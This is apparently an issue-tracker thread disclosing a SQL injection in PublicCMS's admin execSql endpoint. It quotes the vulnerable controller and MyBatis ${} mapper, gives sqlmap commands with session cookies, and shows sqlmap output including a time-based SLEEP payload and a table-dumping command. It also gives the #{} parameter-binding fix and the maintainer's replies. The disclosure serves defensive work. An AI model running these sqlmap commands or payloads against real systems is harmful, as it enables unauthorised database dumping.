There is a SQL Injection vulnerability that can dump the database

[x00er]

Where SQL injection vulnerability code appears
com.publiccms.controller.admin.sys.SysSiteAdminController

`@RequestMapping("execSql")

@Csrf

public String execSql(@RequestAttribute SysSite site, @SessionAttribute SysUser admin, String sql, HttpServletRequest request,

        ModelMap model) {

    if (ControllerUtils.verifyCustom("noright", !siteComponent.isMaster(site.getId()), model)) {

        return CommonConstants.TEMPLATE_ERROR;

    }

    if (-1 < sql.indexOf(CommonConstants.BLANK_SPACE)) {

        String type = sql.substring(0, sql.indexOf(CommonConstants.BLANK_SPACE));

        try {

            if ("update".equalsIgnoreCase(type)) {

                model.addAttribute("result", sqlService.update(sql));

            } else if ("insert".equalsIgnoreCase(type)) {

                model.addAttribute("result", sqlService.insert(sql));

            } else if ("delete".equalsIgnoreCase(type)) {

                model.addAttribute("result", sqlService.delete(sql));

            } else {

                model.addAttribute("result", JsonUtils.getString(sqlService.select(sql)));

            }

        } catch (Exception e) {

            model.addAttribute("error", e.getMessage());

        }

        model.addAttribute("sql", sql);

        logOperateService.save(new LogOperate(site.getId(), admin.getId(), LogLoginService.CHANNEL_WEB_MANAGER,

                "execsql.site", RequestUtils.getIpAddress(request), CommonUtils.getDate(), JsonUtils.getString(model)));

    }

    return CommonConstants.TEMPLATE_DONE;

}`

sqlService.update(sql)=>SqlMapper.xml
<mapper namespace="com.publiccms.logic.mapper.tools.SqlMapper"> <select id="select" parameterType="String" resultType="map">${sql}</select> <select id="query" parameterType="String" resultType="map">${sql}</select> <insert id="insert" parameterType="String">${sql}</insert> <update id="update" parameterType="String">${sql}</update> <delete id="delete" parameterType="String">${sql}</delete> </mapper>

Url address is http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql
post data:"_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221"
Parameter 'sql' is not filtered and controllable
we can use sqlmap to test the vulnerability:
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "PUBLICCMS_ADMIN=1_353b342a-075c-4a71-9f13-c20e5b30b603; JSESSIONID=BBA83A42D2455445CFE0A504F287C9DB; Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221" --level 3 --dbms mysql

sqlmap identified the following injection point(s) with a total of 751 HTTP(s) requests:

Parameter: sql (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: _csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=(SELECT * FROM (SELECT(SLEEP(5)))CKuT)

[20:45:23] [INFO] the back-end DBMS is MySQL web application technology: JSP
back-end DBMS: MySQL >= 5.0.12

view the tables in PublicCMS databases:
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "JSESSIONID=70640223FE44003BC029AAAB54D24BC8; PUBLICCMS_ADMIN=1_2df43cfb-9546-4cdb-8150-6482f1b028de;Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=2df43cfb-9546-4cdb-8150-6482f1b028de&sql=111" --level 5 -D publiccms --tables

how to fix:
${} （不安全的写法）
使用 ${foo} 这样格式的传入参数会直接参与SQL编译，类似字符串拼接的效果，是存在SQL注入漏洞的。

#{}
使用 #{} 做参数绑定时， MyBatis 会将SQL语句进行预编译，避免SQL注入的问题。

[sanluan]

This is a database maintenance function for super administrators

[x00er]

This is a database maintenance function for super administrators

This is not a common SQL query. It has a SQL injection vulnerability, which may not only cause information disclosure, but also cause the server to be remotely controlled and backdoor installed

[sanluan]

已修改